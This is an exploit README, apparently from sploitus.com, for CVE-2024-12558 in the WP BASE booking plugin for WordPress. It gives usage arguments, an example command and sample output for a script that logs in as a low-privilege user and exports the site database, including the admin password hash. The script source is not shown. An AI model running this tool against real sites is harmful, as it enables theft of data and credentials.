## https://sploitus.com/exploit?id=CE9776DD-0F34-556A-B658-2D3A3C62DF25
# CVE-2024-12558-exploit
# Description
The WP BASE Booking of Appointments, Services and Events plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_db function in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to expose sensitive information from the database, such as the hashed administrator password.
## Usage:
### Command-Line Arguments
| Argument | Description | Required |
|--------------------|------------------------------------------------------------|----------|
| `-u`, `--url` | Base URL of the WordPress site (e.g., `http://example.com`) | โ |
| `-U`, `--username` | WordPress username. | โ |
| `-p`, `--password` | WordPress password. | โ |
| `-o`, `--output` | File to save the database export (default: `output.sql`). | โ |
Example Command
```
python CVE-2024-12558.py -u http://example.com -U username -p password -o output.sql
```
### Expected Output:
Here is an example of what the script might output:
```
Checking for the existence of the plugin at http://example.com/wp-content/plugins/wp-base-booking-of-appointments-services-and-events/...
Plugin found! Proceeding with further checks.
Checking version at http://example.com/wp-content/plugins/wp-base-booking-of-appointments-services-and-events/readme.txt...
Found version: 4.9.2
The site is vulnerable! Version 4.9.2 detected.
Attempting to log in...
Logged in successfully.
Sending POST request to export the database...
Database export request successful!
Database saved to output.sql
```
### Install the required packages
```
pip install requests
pip install colorama
```
### Note:
This script is provided for educational purposes only. The author is not responsible for any damages caused by the misuse of this script.